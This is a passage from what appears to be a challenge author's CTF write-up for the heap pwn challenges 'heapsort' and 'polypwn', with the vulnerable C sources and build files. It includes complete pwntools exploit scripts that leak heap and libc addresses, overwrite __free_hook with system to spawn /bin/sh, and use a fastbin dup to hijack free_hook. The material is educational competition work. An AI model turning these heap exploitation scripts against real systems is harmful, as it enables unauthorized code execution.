    absflip(exe.address+0x4010+3, 7)
    r.interactive()

if __name__ == "__main__":
    main()

I’ll also note that there may be an easier unintended solution by flipping the libc GOT strlen function such that it returns some large value, so the puts of the string in the base program overreads and leaks base addresses.

heapsort

Heapsort was a classic heapnotes challenge with an unusual vulnerability: sort-after-free.

source

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

char *start, *end;
#define MAXCHUNKS 16
#define DEFAULTSZ 0xf8
#define BARRIERSZ 0x18

void error(char *s) {
	fprintf(stderr, "%s\n", s);
	exit(1);
}

void delete(int idx) {
	if(idx < 0 || idx >= MAXCHUNKS)
		error("invalid index in delete");
	char *p = start + idx*(DEFAULTSZ+BARRIERSZ+0x10);
	char *b = p-8-BARRIERSZ;
	if(*b != (char)0xff) {
		free(p);
		memset(b, 0xff, BARRIERSZ);
		return;
	}
	error("double free detected");
}

char *alloc(size_t size) {
	if(size > DEFAULTSZ)
		error("size too large");
	char *p;
	p = malloc(DEFAULTSZ);
	if(p < start || p > end)
		error("chunk out of bounds");
	char *b = p-8-BARRIERSZ;
	memset(b, 0x69, BARRIERSZ);
	printf("data: ");
	fflush(stdout);
	int cnt = read(0, p, size-1);
	if(cnt <= 0)
		error("invalid read");
	p[cnt] = 0;
	return p;
}

void view(int idx) {
	if(idx < 0 || idx >= MAXCHUNKS)
		error("invalid index in view");
	char *p = start + idx*(DEFAULTSZ+BARRIERSZ+0x10);
	char *b = p-8-BARRIERSZ;
	if(*b == (char)0xff) {
		printf("cannot view deleted chunks\n");
		return;
	}
	printf("aplet123\n");
}

void swap(int i1, int i2) {
	char buf[DEFAULTSZ+BARRIERSZ+0x10];
	char *p1 = start + i1*(DEFAULTSZ+BARRIERSZ+0x10)-8-BARRIERSZ;
	char *p2 = start + i2*(DEFAULTSZ+BARRIERSZ+0x10)-8-BARRIERSZ;
	memcpy(buf, p1, DEFAULTSZ+BARRIERSZ+0x10);
	memcpy(p1, p2, DEFAULTSZ+BARRIERSZ+0x10);
	memcpy(p2, buf, DEFAULTSZ+BARRIERSZ+0x10);
}

int cmp(int i1, int i2) {
	char *p1 = start + i1*(DEFAULTSZ+BARRIERSZ+0x10);
	char *p2 = start + i2*(DEFAULTSZ+BARRIERSZ+0x10);
	return strcmp(p1, p2);
}

void sort() {
	for(int i = 0; i < MAXCHUNKS-1; i++)
		for(int j = 0; j < MAXCHUNKS-i-1; j++)
			if(cmp(j, j+1) > 0)
				swap(j, j+1);
}

void barrier() {
	char *p = malloc(BARRIERSZ);
	memset(p, 0xff, BARRIERSZ);
}

void setup() {
	barrier();
	start = malloc(DEFAULTSZ);
	for(int i = 1; i < MAXCHUNKS-1; i++) {
		barrier();
		malloc(DEFAULTSZ);
	}
	barrier();
	end = malloc(DEFAULTSZ);
	barrier();
	if(!start || !end)
		error("setup failed");
	for(int i = 0; i < MAXCHUNKS; i++)
		free(start + i*(DEFAULTSZ+BARRIERSZ+0x10));
}

int readint() {
	char buf[0x10];
	fflush(stdout);
	read(0, buf, sizeof(buf));
	return atoi(buf);
}

int main() {
	printf("1: alloc\n");
	printf("2: delete\n");
	printf("3: view\n");
	printf("4: sort\n");
	setup();
	for(;;) {
		printf("choice: ");
		switch(readint()) {
		case 1:
			printf("size: ");
			alloc(readint());
			break;
		case 2:
			printf("idx: ");
			delete(readint());
			break;
		case 3:
			printf("idx: ");
			view(readint());
			break;
		case 4:
			sort();
			break;
		case 5:
			return 0;
		default:
			printf("invalid choice\n");
			return 1;
		}
	}
	return 1;
}

overview

We have the ability to allocate chunks of a fixed size and free them. Our view function is seemingly useless, printing “aplet123” regardless of what’s inside the chunk. There are no traditional vulnerabilities, and there’s even an additional mitigation where the chunks that we allocate are constrained to be within the heap. Let’s first look at the heap layout initialized in setup.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
void barrier() {
	char *p = malloc(BARRIERSZ);
	memset(p, 0xff, BARRIERSZ);
}

void setup() {
	barrier();
	start = malloc(DEFAULTSZ);
	for(int i = 1; i < MAXCHUNKS-1; i++) {
		barrier();
		malloc(DEFAULTSZ);
	}
	barrier();
	end = malloc(DEFAULTSZ);
	barrier();
	if(!start || !end)
		error("setup failed");
	for(int i = 0; i < MAXCHUNKS; i++)
		free(start + i*(DEFAULTSZ+BARRIERSZ+0x10));
}

Each 0x100 user chunk, is surrounded by 0x20 barrier chunks that are memset with the value 0xff indicating that the user chunk below it is free. Then, the 16 user chunks are freed and sorted into tcache and smallbins so that they’ll be returned to the user on subsequent allocations. start and end are also set such that the user can’t allocate chunks outside of this range. The barriers are never freed, but their values are memset appropriately when the user chunk below them is allocated/freed.

The sort function sorts the 16 user chunks using strcmp. The swapping works as intended and preserves the barrier chunks, but freed chunks are sorted along with allocated chunks. Because the tcache and smallbins hold pointers to the first chunk, it’s possible to sort an allocated chunk with fake addresses into the bins. If we have leaks, this gets us one step closer to arbitrary write, although we would still have to bypass the range check on the chunk to be within the heap.

solution

The binary is non-PIE, so we don’t need to leak base, but our exploitation is impossible without heap and libc leak. So how do we leak without being able to view chunks? Sorting! Our view actually tells us whether the chunk is free or not. This allows us to perform binary search, controlling a single user chunk and being able to tell whether it’s value is greater than or less than the address in a freed chunk. Because our freed chunks will also go into the smallbin, this allows us to leak both libc and heap.

Now with leaks, how do we bypass the range restriction? Because we know the base address and the range variables are globals in bss, we can allocate a chunk on top of them such that malloc will zero out the start variable. Because the base will be before the heap, this makes the check, which happens immediately after the malloc, succeed. Then, with our actual write, we can change end to some large value. We have to be careful here, however, to rewrite start with the heap address it was before. The program uses indexing relative to start, so if we don’t restore it, we would lose access to the heap.

Now that we have arbitrary write, we can overwrite freehook with system. The full solve script is shown below.

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
#!/usr/bin/env python3

from pwn import *

exe = ELF("./heapsort")
libc = ELF("./libc.so.6")

serv = "chall.lac.tf"
port = 31168

context.binary = exe

def conn():
    if args.REMOTE:
        r = remote(serv, port)
    else:
        r = process([exe.path])
        if args.GDB:
            gdb.attach(r, gdbscript="""
            """)
    return r

r = conn()

def add(data):
    r.sendlineafter(b"choice:", b"1")
    r.sendlineafter(b"size:", str(0xf8).encode())
    r.sendafter(b"data:", data)

def free(idx):
    r.sendlineafter(b"choice:", b"2")
    r.sendlineafter(b"idx:", str(idx).encode())

def view(idx):
    r.sendlineafter(b"choice:", b"3")
    r.sendlineafter(b"idx:", str(idx).encode())

def sort():
    r.sendlineafter(b"choice:", b"4")

def doleak(n, idx, partial):
    leak = partial
    for i in range(n):
        test = 0
        start = 0 
        end = 0x100
        while start < end:
            mid = (start + end) // 2
            add(leak + p8(mid))
            sort()
            view(idx)
            gt = b"cannot" in r.recvline()
            if gt:
                free(idx+1)
                end = mid
            else:
                free(idx)
                start = mid + 1
            if start == mid or start >= end:
                test = start
                break
        if test >= 256:
            print("unlucky")
            exit()
        add(leak + p8(test))
        sort()
        view(idx)
        gt = b"cannot" in r.recvline()
        if gt:
            free(idx+1)
            test -= 1
        else:
            free(idx)
        if test < 0:
            test = 0
        leak += p8(test)
    return leak

def main():
    for _ in range(5):
        add(b"\x00")
    for _ in range(7):
        add(b"\xff")
    heap = u64(doleak(4, 6, b"\xb0").ljust(8, b"\x00"))
    log.info(f"{hex(heap)=}")
    libc.address = u64(doleak(6, 7, b"\xe0").ljust(8, b"\x00"))-0x1ecbe0
    log.info(f"{hex(libc.address)=}")
    add(p64(0x404050))
    add(b"\xff")
    add(b"\xff"*8 + p64(heap-0x7e0))
    for i in range(5):
        free(i)
    for i in range(2):
        add(b"\xff")
    add(p64(libc.sym.__free_hook))
    sort()
    add(b"/bin/sh")
    add(p64(libc.sym.system))
    free(1)
    r.interactive()

if __name__ == "__main__":
    main()

polypwn

Polypwn was a “polyglot” heap challenge. I wrote the flavor text assuming that the arm binary was 64 bit, but I accidentally used the wrong compiler so it was 32 bit. This doesn’t really affect the solution, but it’s a pretty big mistake on my part so I apologize.

source

frontend.c

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
#include <time.h>
#include <fcntl.h>
#include <errno.h>
#include <stdio.h>
#include <signal.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/select.h>

#define NDAEMONS 3
#define MAXINP 4096
char *names[] = {
	"Imp386",
	"AArchfiend64",
	"MIPS the Malevolent",
};
char *paths[][2] = {
	{"./x86", 0},
	{"./arm", 0},
	{"./mips", 0},
};

int incap = -1;
typedef struct Proc Proc;
struct Proc {
	pid_t pid;
	int pipein[2];
	int pipeout[2];
	char secret[10];
	int haswon;
};
Proc daemons[NDAEMONS];

int readint()
{
	char input[0x10];
	fflush(stdout);
	read(0, input, sizeof(input));
	return atoi(input);
}

void doexit(int status)
{
	for(int i = 0; i < NDAEMONS; i++)
		if(daemons[i].pid != 0)
			kill(daemons[i].pid, SIGKILL);
	exit(status);
}

void sigusr(int sig)
{
	printf("daemon summoning failed, contact admin!\n");
	doexit(1);
}

void menu()
{
	printf("+---------------------------+\n");
	printf("|     pwn wizards only!     |\n");
	printf("+---------------------------+\n");
	printf("|    1. cast spell          |\n");
	printf("|    2. list spells         |\n");
	printf("|    3. ask for flag        |\n");
	printf("|    4. exit                |\n");
	printf("+---------------------------+\n");
}

void help()
{
	printf("\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n");
	printf("         spellbook\n");
	printf("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n");
	printf("  > (1) polymorph\n");
	printf("  > (2) telekinesis\n");
	printf("\n");
}

void check(int i)
{	
	fd_set fds;
	struct timeval tv;

	tv.tv_sec = 5;
	tv.tv_usec = 0;
	FD_ZERO(&fds);
	FD_SET(daemons[i].pipeout[0], &fds);
	int ret = select(daemons[i].pipeout[0]+1, &fds, 0, 0, &tv);
	if(ret == -1) {
		perror("select");
		doexit(1);
	} else if(ret) {
		char buf[0x20];
		int cnt = read(daemons[i].pipeout[0], buf, 0x20);
		if(cnt >= 9) {
			buf[9] = 0;
			if(strcmp(buf, "HEARTBEAT") != 0) {
				if(strcmp(buf, daemons[i].secret) == 0) {
					daemons[i].haswon = 1;
					return;
				}
			} else
				return;
		}
	}
	printf("response failure: %s\n", names[i]);
	doexit(1);
}

void cast()
{
	printf("spell to cast: ");
	switch(readint()) {
		case 1:
			printf("target daemon: ");
			int target = readint();
			if(target < 0 || target >= NDAEMONS) {
				incap = -1;
				printf("invalid target, resetting polymorph\n");
				return;
			}
			printf("incapacitating %s\n", names[target]);
			incap = target;
			break;
		case 2:
			printf("size: ");
			int len = readint();
			if(len <= 0 || len >= MAXINP) {
				printf("invalid size\n");
				return;
			}
			printf("data: ");
			fflush(stdout);
			char buf[MAXINP];
			int cnt = read(0, buf, len);
			if(cnt <= 0) {
				printf("invalid read");
				doexit(1);
			}
			for(int i = 0; i < NDAEMONS; i++) {
				if(i != incap)
					write(daemons[i].pipein[1], buf, cnt);
			}
			for(int i = 0; i < NDAEMONS; i++) {
				if(i != incap)
					check(i);
			}
			break;
		default:
			printf("invalid spell\n");
			break;
	}
}

void summon()
{
	for(int i = 0; i < NDAEMONS; i++) {
		printf("summoning: (%d) %s\n", i, names[i]);
		int rfd = open("/dev/urandom", O_RDONLY);
		if(rfd == -1) {
			perror("cannot open /dev/urandom");
			doexit(1);
		}
		int cnt = read(rfd, daemons[i].secret, 9);
		if(cnt != 9) {
			perror("/dev/urandom read failure");
			doexit(1);
		}
		char charset[] = "0123456789abcdefghijklmnopqrstuvwxyz";
		daemons[i].secret[9] = 0;
		for(int j = 0; j < 9; j++)
			daemons[i].secret[j] = charset[((unsigned char)daemons[i].secret[j]) % (sizeof(charset)-1)];
		printf("secret: %s\n", daemons[i].secret);
		if(pipe(daemons[i].pipein) == -1 || pipe(daemons[i].pipeout) == -1) {
			perror("pipe");
			doexit(1);
		}
		daemons[i].pid = fork();
		if(daemons[i].pid < 0) {
			perror("fork");
			doexit(1);
		}
		if(daemons[i].pid == 0) {
			close(daemons[i].pipein[1]);
			dup2(daemons[i].pipein[0], STDIN_FILENO);
			close(daemons[i].pipein[0]);
			close(daemons[i].pipeout[0]);
			dup2(daemons[i].pipeout[1], STDOUT_FILENO);
			close(daemons[i].pipeout[1]);
			execve(paths[i][0], paths[i], NULL);
			kill(getppid(), SIGUSR2);
			exit(1);
		} else {
			close(daemons[i].pipein[0]);
			close(daemons[i].pipeout[1]);
		}
	}
}

void ask()
{
	int wincnt = 0;
	for(int i = 0; i < NDAEMONS; i++)
		wincnt += daemons[i].haswon;
	if(wincnt >= NDAEMONS) {
		printf("the daemons all agree, you deserve a flag!\n");
		FILE *fp = fopen("flag.txt", "r");
		if(!fp) {
			printf("no flag.txt, contact admin!\n");
			doexit(1);
		}
		char buf[100] = {};
		fread(buf, 1, 100, fp);
		puts(buf);
		doexit(0);
	}
	printf("%d daemons still need convincing, ask harder!\n", NDAEMONS-wincnt);
}

int main()
{
	signal(SIGUSR2, sigusr);
	summon();
	menu();
	for(;;) {
		printf("your choice: ");
		fflush(stdout);
		switch(readint()) {
		case 1:
			cast();
			break;
		case 2:
			help();
			break;
		case 3:
			ask();
			break;
		default:
			printf("invalid choice\n");
		case 4:
			doexit(0);
			break;
		}
	}
}

backend.c

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define MAXINP 4096

void heartbeat()
{
	printf("HEARTBEAT");
	fflush(stdout);
}

int readint()
{
	char buf[MAXINP];
	read(0, buf, MAXINP);
	heartbeat();
	return atoi(buf);
}

#define MAXCHUNKS 64
char *chunks[MAXCHUNKS];

void add()
{
	int idx = readint();
	if(idx >= MAXCHUNKS || idx < 0)
		return;
	chunks[idx] = malloc(readint());
}

void edit()
{
	char buf[MAXINP];
	int idx = readint();
	if(idx >= MAXCHUNKS || idx < 0)
		return;
	int size = readint();
	if(size >= MAXINP || size < 0)
		return;
	read(0, buf, MAXINP);
	heartbeat();
	for(int i = 0; i < size; i++)
		chunks[idx][i] = buf[i];
}

void delete()
{
	int idx = readint();
	if(idx >= MAXCHUNKS || idx < 0)
		return;
	free(chunks[idx]);
}

int main(int argc, char **argv)
{
	for(;;) {
		int input = readint();
		switch(input) {
		case 1:
			add();
			break;
		case 2:
			edit();
			break;
		case 3:
			delete();
			break;
		default:
			break;
		}
	}
}
Makefile
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
CC_MIPS = mips64-linux-gnuabi64-gcc
CC_ARM = arm-linux-gnueabi-gcc
CC_X86 = gcc -m32
CC = gcc
CF = -no-pie -fno-stack-protector -static
OUT_MIPS = mips
OUT_X86 = x86
OUT_ARM = arm
OUT_FRONTEND = polypwn

all: $(OUT_MIPS) $(OUT_X86) $(OUT_ARM) $(OUT_FRONTEND)

$(OUT_MIPS): backend.c
	$(CC_MIPS) $(CF) -o $(OUT_MIPS) $<
	mips-linux-gnu-strip $(OUT_MIPS)

$(OUT_X86): backend.c
	$(CC_X86) $(CF) -o $(OUT_X86) $<
	strip $(OUT_X86)

$(OUT_ARM): backend.c
	$(CC_ARM) $(CF) -o $(OUT_ARM) $<
	arm-linux-gnueabi-strip $(OUT_ARM)

$(OUT_FRONTEND): frontend.c
	$(CC) -o $(OUT_FRONTEND) $<
	strip $(OUT_FRONTEND)

clean:
	rm -f $(OUT_MIPS) $(OUT_ARM) $(OUT_X86) $(OUT_FRONTEND)

overview

All of the daemons are the same statically-linked vulnerable heapnotes program. Despite the different architectures, the glibc heap will behave the same, so we can do a simple fastbin dup to overwrite freehook with printf and free a chunk containing our secret to satisfy the daemon. Where the programs differ is the addresses for the printf and freehook as well as the secret itself.

solution

The only atomic operation we need is edit. It’s pretty easy to devise a method to edit only one of the daemons by using the polymorph ability. Once we have this, we can just use the atomic edit on each daemon with their respective offsets and secrets. The solve script is shown below.

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
#!/usr/bin/env python3

from pwn import *

exe = ELF("./polypwn")

context.binary = exe

serv = "chall.lac.tf"
port = 31167

def conn():
    if args.REMOTE:
        r = remote(serv, port)
    else:
        r = process([exe.path])
        if args.GDB:
            gdb.attach(r, gdbscript="""
            """)
    return r

r = conn()

def poly(idx):
    r.sendlineafter(b"choice:", b"1")
    r.sendlineafter(b"cast:", b"1")
    r.sendlineafter(b"daemon:", str(idx).encode())

def cast(data):
    r.sendlineafter(b"choice:", b"1")
    r.sendlineafter(b"cast:", b"2")
    r.sendlineafter(b"size:", b"4095")
    r.sendlineafter(b"data:", data)

def add(idx, size):
    cast(b"1")
    cast(str(idx).encode())
    cast(str(size).encode())

def free(idx):
    cast(b"3")
    cast(str(idx).encode())

def editone(idx, size, data, id):
    bad = [0, 1, 2]
    bad.remove(id)
    poly(bad[0])
    cast(b"2")
    poly(bad[1])
    if idx < 4:
        print("idx cannot overlap command")
        exit()
    cast(str(idx).encode())
    if size < 4:
        print("size cannot overlap command")
        exit()
    cast(str(size).encode())
    cast(data)
    poly(bad[0])
    cast(b"0")
    cast(b"69")
    cast(b"A")
    poly(-1)

def main():
    r.recvuntil(b"secret: ")
    x86_pswd = r.recvline().strip()
    r.recvuntil(b"secret: ")
    arm_pswd = r.recvline().strip()
    r.recvuntil(b"secret: ")
    mips_pswd = r.recvline().strip()

    # there is some racing that makes this fail occasionally

    X86 = 0
    ARM = 1
    MIPS = 2
    x86_freehook = 0x80e682c
    x86_printf = 0x80519b0
    arm_freehook = 0x8b3d0
    arm_printf = 0x17304
    mips_freehook = 0x1200a1228
    mips_printf = 0x12000bc80

    add(0, 0x69)
    base = 16
    add(base+0, 0x18)
    add(base+1, 0x18)
    free(base+0)
    free(base+1)
    editone(base+1, 4, p32(x86_freehook), X86)
    editone(base+1, 4, p32(arm_freehook), ARM)
    editone(base+1, 8, p64(mips_freehook, endian="big"), MIPS)
    add(base+0, 0x18)
    add(base+1, 0x18)
    editone(base+1, 4, p32(x86_printf), X86)
    editone(base+1, 4, p32(arm_printf), ARM)
    editone(base+1, 8, p64(mips_printf, endian="big"), MIPS)
    add(base+2, 0x18)
    editone(base+2, 0x18, x86_pswd, X86)
    editone(base+2, 0x18, arm_pswd, ARM)
    editone(base+2, 0x18, mips_pswd, MIPS)
    free(base+2)
    cast(b"A")
    r.sendlineafter(b"choice:", b"3")
    r.interactive()

if __name__ == "__main__":
    main()